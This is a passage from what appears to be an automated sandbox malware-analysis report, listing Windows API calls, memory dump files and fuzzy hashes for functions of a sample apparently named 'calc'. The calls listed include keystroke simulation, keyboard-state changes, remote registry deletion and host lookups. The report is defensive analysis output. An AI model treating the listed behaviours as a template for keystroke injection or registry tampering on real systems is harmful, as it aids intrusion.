    • SetFilePointer.KERNEL32(000000FF,?,00000000,00000000,?,?,0043CB60,000000FF,000000FF,?,00000000,000000FF,?,?,0043C90A,?), ref: 0043CBF5
    • SetFilePointer.KERNEL32(000000FF,00000000,00000000,00000002,?,?,0043CB60,000000FF,000000FF,?,00000000,000000FF,?,?,0043C90A,?), ref: 0043CC01
    • SetFilePointer.KERNEL32(000000FF,?,00000000,00000000,?,?,0043CB60,000000FF,000000FF,?,00000000,000000FF,?,?,0043C90A,?), ref: 0043CC0D
    • SetLastError.KERNEL32(00000000,?,?,0043CB60,000000FF,000000FF,?,00000000,000000FF,?,?,0043C90A,?,00000000,00000000), ref: 0043CC18
    • SetLastError.KERNEL32(00000006,000000FF,00000000,00000000,?,?,0043CB60,000000FF,000000FF,?,00000000,000000FF,?,?,0043C90A,?), ref: 0043CC25
    Memory Dump Source
    • Source File: 00000000.00000002.1664028640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.1664003706.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664071771.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.000000000047E000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664186396.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_calc.jbxd
    Similarity
    • API ID: File$Pointer$ErrorLast$ReadType
    • String ID:
    • API String ID: 74101062-0
    • Opcode ID: a69c8df32c0e20c753d7404060deeb2171b2dec1cf91e1f050b34e5e6fe33c2c
    • Instruction ID: ecafed72938480ac762a22eb363c2c95b40075f44803c8607e6e5373edb57986
    • Opcode Fuzzy Hash: a69c8df32c0e20c753d7404060deeb2171b2dec1cf91e1f050b34e5e6fe33c2c
    • Instruction Fuzzy Hash: 64115872900209FFEB019FA09DC8C7F7B7DEB48395F106466F505A2250C7349D11DBA5
    Function 00401DB3 Relevance: 13.6, APIs: 9, Instructions: 64sleepkeyboardwindowCOMMON
    Download Yara Rule
    APIs
    • MapVirtualKeyW.USER32(00000025,00000000), ref: 00401DD7
    • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 00401DF5
    • Sleep.KERNEL32(00000000,?,0043FF5E,00000001,TABRIGHT,TABLEFT,ISENABLED,ISVISIBLE), ref: 00401DF8
    • MapVirtualKeyW.USER32(00000025,00000000), ref: 00401E01
    • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00401E39
    • Sleep.KERNEL32(00000000,?,0043FF5E,00000001,TABRIGHT,TABLEFT,ISENABLED,ISVISIBLE), ref: 00401E3C
    Memory Dump Source
    • Source File: 00000000.00000002.1664028640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.1664003706.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664071771.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.000000000047E000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664186396.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_calc.jbxd
    Similarity
    • API ID: MessagePostSleepVirtual
    • String ID:
    • API String ID: 660143448-0
    • Opcode ID: c5f8dfd490d2f8feaa47010e345f7e16d08157c92134579223c2cf7de968ed32
    • Instruction ID: 314088039eba6aec791dc48b178ba8ec29ead1ba01d9ff949e3fc8231b8fac0c
    • Opcode Fuzzy Hash: c5f8dfd490d2f8feaa47010e345f7e16d08157c92134579223c2cf7de968ed32
    • Instruction Fuzzy Hash: C8019631140608BFF6216F51CC49FAB7A5DDF45786F110829F790A50E2C9FAAC91997C
    Function 00411A14 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 343COMMON
    Download Yara Rule
    APIs
    • _strlen.LIBCMT ref: 00411A34
    • _strlen.LIBCMT ref: 00411A46
    • VkKeyScanA.USER32(00000000), ref: 00411AE3
    • VkKeyScanA.USER32(00000000), ref: 00411B96
      • Part of subcall function 00410DF3: VkKeyScanA.USER32(?), ref: 00410DFB
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.1664028640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.1664003706.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664071771.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.000000000047E000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664186396.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_calc.jbxd
    Similarity
    • API ID: Scan$_strlen
    • String ID: 0%d$down$off
    • API String ID: 1220333230-2112978555
    • Opcode ID: b70f037b52459c69d1e4094a3fc96cc7736b76eafc8b3a127681ec6e52b1637f
    • Instruction ID: e69c97ce56cf479a7f09eb9e4295095d95da97d2fa2f27f976221b7850857607
    • Opcode Fuzzy Hash: b70f037b52459c69d1e4094a3fc96cc7736b76eafc8b3a127681ec6e52b1637f
    • Instruction Fuzzy Hash: 11C14930A44245AEEF20CF55C845FEB7B74DF41308F24405BEA419B2A2E67C9DC6C799
    Function 004092FB Relevance: 12.4, APIs: 8, Instructions: 428COMMON
    Download Yara Rule
    Memory Dump Source
    • Source File: 00000000.00000002.1664028640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.1664003706.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664071771.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.000000000047E000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664186396.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_calc.jbxd
    Similarity
    • API ID: ClearVariant
    • String ID:
    • API String ID: 1473721057-0
    • Opcode ID: 51004693d88b0729752c3e2e6fd21d15dec76c629f8c13dc28b7f9a39be731a4
    • Instruction ID: 01edab73392a80d4103d92ff6f361a6a440f26f9ffb4b8913aacefb8a2784695
    • Opcode Fuzzy Hash: 51004693d88b0729752c3e2e6fd21d15dec76c629f8c13dc28b7f9a39be731a4
    • Instruction Fuzzy Hash: F3021476900208EFCF119F94C8409EE7BB5EF49314F15816AFA18B73A2C339AD51DB99
    Function 0040FFA0 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 177COMMON
    Download Yara Rule
    Strings
    • #include depth exceeded. Make sure there are no recursive includes, xrefs: 0040FFC5
    • Unterminated string, xrefs: 004101AD
    • Error opening the file, xrefs: 0041000D
    Memory Dump Source
    • Source File: 00000000.00000002.1664028640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.1664003706.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664071771.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.000000000047E000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664186396.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_calc.jbxd
    Similarity
    • API ID: HandleLoadModuleString
    • String ID: #include depth exceeded. Make sure there are no recursive includes$Error opening the file$Unterminated string
    • API String ID: 3590730445-3232779785
    • Opcode ID: c3d6a63939e096763d4e40ef5f0432d105b5116fac32a727dd325dbee97e13c3
    • Instruction ID: 77393d9a191bb7f7478c373efea1c4ed925f04e9ca4268ec523b6ef09f5006fe
    • Opcode Fuzzy Hash: c3d6a63939e096763d4e40ef5f0432d105b5116fac32a727dd325dbee97e13c3
    • Instruction Fuzzy Hash: 95616F7280421DBEEF21DBA0CC45FDE7B78AF05308F0440ABF905A2152DB7D9AC98B59
    Function 004133AD Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 123windowCOMMON
    Download Yara Rule
    APIs
    • GetMenuItemInfoW.USER32(?,000000FF,00000000,0000002C), ref: 00413437
    • IsMenu.USER32(00000000), ref: 0041344D
    • CreatePopupMenu.USER32 ref: 00413489
    • GetMenuItemCount.USER32(?), ref: 004134E2
    • InsertMenuItemW.USER32(00000000,000000F5,00000001,0000002C), ref: 00413509
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.1664028640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.1664003706.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664071771.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.000000000047E000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664186396.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_calc.jbxd
    Similarity
    • API ID: Menu$Item$CountCreateInfoInsertPopup
    • String ID: ,$2
    • API String ID: 93392585-4146714288
    • Opcode ID: 96b5094224ff491608ca524e3ef8238d77196a8e218a0bed69d208cc94b3b17b
    • Instruction ID: a783e2e86e23b152b86a37afb85d67028e09b8e793856ccb80c6acdd71082a21
    • Opcode Fuzzy Hash: 96b5094224ff491608ca524e3ef8238d77196a8e218a0bed69d208cc94b3b17b
    • Instruction Fuzzy Hash: DF41A370900209DBDF21CF68C8847EEBBF5AF4471AF18856AE855A7391D3789A80CB59
    Function 0041FCD4 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 116windowCOMMON
    Download Yara Rule
    APIs
    • LoadStringW.USER32(00000066,?,00000FFF,?), ref: 0041FD29
    • LoadStringW.USER32(?,?,00000FFF), ref: 0041FD3C
    • MessageBoxW.USER32(?,?,00011010), ref: 0041FE42
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.1664028640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.1664003706.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664071771.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.000000000047E000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664186396.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_calc.jbxd
    Similarity
    • API ID: LoadString$Message
    • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:
    • API String ID: 2278601591-4162891365
    • Opcode ID: 3b459048b0f7501f7dc6e11490a2cdde38ba61c7cfcf35ebe61d3d04fa2e046c
    • Instruction ID: ee04281732928d5b98adbc9f49825bd154e7ff119a3da136eabcaa7874e413dc
    • Opcode Fuzzy Hash: 3b459048b0f7501f7dc6e11490a2cdde38ba61c7cfcf35ebe61d3d04fa2e046c
    • Instruction Fuzzy Hash: 0841C872D00218AADF21ABA5CC45FDE77ACAF05308F0040B7F908E6152E67D9E89DB5D
    Function 004159F1 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 70networkCOMMON
    Download Yara Rule
    APIs
    • WSAStartup.WSOCK32(00000101,?), ref: 00415A09
    • gethostname.WSOCK32(?,00000100,00000101,?), ref: 00415A22
    • gethostbyname.WSOCK32(?,?,00000100,00000101,?), ref: 00415A2E
    • inet_ntoa.WSOCK32(?,00000101,?), ref: 00415A75
    • _strcat.LIBCMT ref: 00415A82
    • WSACleanup.WSOCK32(?,?,?,?,?,?,00000101,?), ref: 00415AAA
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.1664028640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.1664003706.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664071771.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.000000000047E000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664186396.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_calc.jbxd
    Similarity
    • API ID: CleanupStartup_strcatgethostbynamegethostnameinet_ntoa
    • String ID: 0.0.0.0
    • API String ID: 642191829-3771769585
    • Opcode ID: 00a698a9f42c775809c1d2d0ac144a3eb17023aeb1ff3d42f5d88e0ba7b446b5
    • Instruction ID: d3789d6f31b40d2e731d2683e6b01f7d561f7210baffac271eff7e217f67039d
    • Opcode Fuzzy Hash: 00a698a9f42c775809c1d2d0ac144a3eb17023aeb1ff3d42f5d88e0ba7b446b5
    • Instruction Fuzzy Hash: 3711E971940118BBFF11BA75CC86EDA33AC9F40368F1401A7B905A6182EA7C9FC59A9D
    Function 00412B78 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 68windowCOMMON
    Download Yara Rule
    APIs
    • LoadIconW.USER32(00000000,00007F03), ref: 00412BC0
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.1664028640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.1664003706.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664071771.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.000000000047E000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664186396.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_calc.jbxd
    Similarity
    • API ID: IconLoad
    • String ID: blank$info$question$stop$warning
    • API String ID: 2457776203-404129466
    • Opcode ID: 1dab5a4c37849c9e9609932a94803abe9922b88540791e85f48b547d4dd9970f
    • Instruction ID: 03b6517efc2aea6fd5e6d95e9b9689b5489a5d42b1b8a25ecbfe9ccecd26a511
    • Opcode Fuzzy Hash: 1dab5a4c37849c9e9609932a94803abe9922b88540791e85f48b547d4dd9970f
    • Instruction Fuzzy Hash: 4C11C63164C305BAFA165E519E02DEF63A8DF1472DB20005BFD02E11C2FAEDBA91519D
    Function 00455946 Relevance: 12.2, APIs: 8, Instructions: 177COMMON
    Download Yara Rule
    APIs
    • GetCPInfo.KERNEL32(?,?,0045C3C8,00000044,00453D57,?,00000000,?,?,00000000,00000000,0045C138,0000001C,0044EC56,00000001,?), ref: 0045598F
    • GetCPInfo.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,00000000,00455939,?), ref: 004559A6
    • _strlen.LIBCMT ref: 004559CA
    • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,00000000,?,?,?,?,?,?,?,00000001,00000000,00455939), ref: 004559EB
    Memory Dump Source
    • Source File: 00000000.00000002.1664028640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.1664003706.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664071771.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.000000000047E000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664186396.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_calc.jbxd
    Similarity
    • API ID: Info$ByteCharMultiWide_strlen
    • String ID:
    • API String ID: 1335377746-0
    • Opcode ID: a603fa9baf5ed065eaea5c27bbd2ea449862a3888a0195e8d527bd101dfb96ab
    • Instruction ID: 790e399b39677daab9e77fb99c5e02dc5982c928aa711800bb143dd447e7e016
    • Opcode Fuzzy Hash: a603fa9baf5ed065eaea5c27bbd2ea449862a3888a0195e8d527bd101dfb96ab
    • Instruction Fuzzy Hash: CC519E70901A18EFDF20DF95DCD89AFBBB9EF45322F20421AF815A6292D7385C45CB58
    Function 0043C20B Relevance: 12.2, APIs: 8, Instructions: 171registryCOMMON
    Download Yara Rule
    APIs
    • RegConnectRegistryW.ADVAPI32(?,00000000,00000000), ref: 0043C2B4
    • RegOpenKeyExW.ADVAPI32(00000000,?,00000000,?,00000000), ref: 0043C2F2
    • RegCloseKey.ADVAPI32(00000000,00000000,00000000), ref: 0043C31D
    • RegDeleteValueW.ADVAPI32(00000000,00000000), ref: 0043C355
    • RegCloseKey.ADVAPI32(00000000), ref: 0043C37E
    • RegCloseKey.ADVAPI32(00000000,00000002,00000000), ref: 0043C3C4
      • Part of subcall function 0043C147: RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?), ref: 0043C178
    • RegCloseKey.ADVAPI32(00000000), ref: 0043C390
    • RegDeleteKeyW.ADVAPI32(00000000,?), ref: 0043C39A
    Memory Dump Source
    • Source File: 00000000.00000002.1664028640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.1664003706.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664071771.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.000000000047E000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664186396.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_calc.jbxd
    Similarity
    • API ID: Close$Delete$ConnectEnumOpenRegistryValue
    • String ID:
    • API String ID: 4081530528-0
    • Opcode ID: c1237f0b978423cb5fe64d3fbbd153af367ada5e8ddff7de9e0049c98443099b
    • Instruction ID: e232bde8f73a62d7fa102d6d414556a0cb7fee49fb5508a77672693c226a2e41
    • Opcode Fuzzy Hash: c1237f0b978423cb5fe64d3fbbd153af367ada5e8ddff7de9e0049c98443099b
    • Instruction Fuzzy Hash: F9516F32900118EBCF10EFA5DC85AEE7774AF08314F14805AF805BB191DB39EE45DBA8
    Function 004115E2 Relevance: 12.2, APIs: 8, Instructions: 170windowCOMMON
    Download Yara Rule
    APIs
    • GetParent.USER32(?), ref: 00411608
    • GetKeyboardState.USER32(?), ref: 0041161D
    • PostMessageW.USER32(?,00000101,00000012,?), ref: 0041167B
    • PostMessageW.USER32(?,00000101,00000011,?), ref: 004116A1
    • PostMessageW.USER32(?,00000101,00000010,?), ref: 004116C7
    • PostMessageW.USER32(?,00000101,00000010,?), ref: 004116ED
    • PostMessageW.USER32(?,00000101,0000005B,?), ref: 00411713
    • SetKeyboardState.USER32(?), ref: 0041175D
    Memory Dump Source
    • Source File: 00000000.00000002.1664028640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.1664003706.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664071771.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.000000000047E000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664186396.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_calc.jbxd
    Similarity
    • API ID: MessagePost$KeyboardState$Parent
    • String ID:
    • API String ID: 87235514-0
    • Opcode ID: aa6c97a283ce8bd674bd44b473ae256e80a0dc0e0aab8d9900478a21e71fb197
    • Instruction ID: 9d733bec55df1b0aa4eacf9c07561fd85a6c8c2a14a1c19906ee9494bf923349
    • Opcode Fuzzy Hash: aa6c97a283ce8bd674bd44b473ae256e80a0dc0e0aab8d9900478a21e71fb197
    • Instruction Fuzzy Hash: 8E51E8305147986AEB318B78CC45BEF7FE49F45340F08445AFAE8CA292C6B9D9C1DB58
    Function 004113CC Relevance: 12.2, APIs: 8, Instructions: 169windowCOMMON
    Download Yara Rule
    APIs
    • GetParent.USER32(?), ref: 004113F4
    • GetKeyboardState.USER32(?,?,00000000), ref: 00411409
    • SetKeyboardState.USER32(?,?,00000000), ref: 00411467
    • PostMessageW.USER32(?,00000100,0000005B,?), ref: 00411493
    • PostMessageW.USER32(?,00000100,00000010,?), ref: 004114B2
    • PostMessageW.USER32(?,00000100,00000010,?), ref: 004114D1
    • PostMessageW.USER32(?,00000100,00000011,?), ref: 004114F0
    • PostMessageW.USER32(?,00000100,00000012,?), ref: 00411524
    Memory Dump Source
    • Source File: 00000000.00000002.1664028640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.1664003706.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664071771.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.000000000047E000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664186396.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_calc.jbxd
    Similarity
    • API ID: MessagePost$KeyboardState$Parent
    • String ID:
    • API String ID: 87235514-0
    • Opcode ID: e78c36a590626a1166a9156384a0d936dda4f0eeaa9d608877eeb85747e89315
    • Instruction ID: 0f22143f38cef481d98d1135c44dc31a521d86ced055d74272154e822a439295
    • Opcode Fuzzy Hash: e78c36a590626a1166a9156384a0d936dda4f0eeaa9d608877eeb85747e89315
    • Instruction Fuzzy Hash: 0D51397050035CBDEB224B788C84BFF7BB5EB40744F04046EE699961A2C6B89EC1DB28
    Function 0040BD45 Relevance: 12.1, APIs: 8, Instructions: 144windowCOMMON
    Download Yara Rule
    APIs
    • 73A245F0.USER32(?,000000F0,?), ref: 0040BDA1
    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040BDCA
    • SendMessageW.USER32(?,0000104D,00000000,00000005), ref: 0040BE1A
    • SendMessageW.USER32(?,00001008,00000001,?), ref: 0040BEF5
    Memory Dump Source
    • Source File: 00000000.00000002.1664028640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.1664003706.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664071771.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.000000000047E000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664186396.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_calc.jbxd
    Similarity
    • API ID: MessageSend$A245
    • String ID:
    • API String ID: 2423781260-0
    • Opcode ID: bdbe2c6dedd3c37e3869dc46a53196839c3a019ccb6d4a3c06a2e9b584f2abaa
    • Instruction ID: c9dee8523dbd2f001bbba7f2df5488a07f0ddf073e31d2c7163cdd95c91364d6
    • Opcode Fuzzy Hash: bdbe2c6dedd3c37e3869dc46a53196839c3a019ccb6d4a3c06a2e9b584f2abaa
    • Instruction Fuzzy Hash: EA514B71900218AFDF11DF94CD41BEE7BB5EF09314F1041A6EA10BB2A1D774AA45DB98
    Function 00417510 Relevance: 12.1, APIs: 8, Instructions: 84COMMON
    Download Yara Rule
    APIs
    Memory Dump Source
    • Source File: 00000000.00000002.1664028640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.1664003706.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664071771.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.000000000047E000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664186396.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_calc.jbxd
    Similarity
    • API ID: InitVariant
    • String ID:
    • API String ID: 1927566239-0
    • Opcode ID: d4ba6389735aa806780dd3cd28894ba1a32fc51c5f1e908e416b473e7926ac5e
    • Instruction ID: 5b2c6dfc33667c660dbbcac74fe3b7b2d15e924b2877dc2a32538863b1b3df48
    • Opcode Fuzzy Hash: d4ba6389735aa806780dd3cd28894ba1a32fc51c5f1e908e416b473e7926ac5e
    • Instruction Fuzzy Hash: 1531FCB290065ABFCB00DFB5DC84986BBADFF08304744852BE919C3A01D734E6A4CFA5
    Function 00417905 Relevance: 12.0, APIs: 8, Instructions: 33COMMON
    Download Yara Rule
    APIs
    Memory Dump Source
    • Source File: 00000000.00000002.1664028640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.1664003706.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664071771.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.000000000047E000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664186396.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_calc.jbxd
    Similarity
    • API ID: ClearVariant
    • String ID:
    • API String ID: 1473721057-0
    • Opcode ID: 7515e139fb4bb4e1bd99acf1861c07cc37c553c4cb4bd1ee9d3f4938d929fa9e
    • Instruction ID: fff72cd69ca82f6953f7f206462b4c09a392314aa2bc16a66ee90bf446161d79
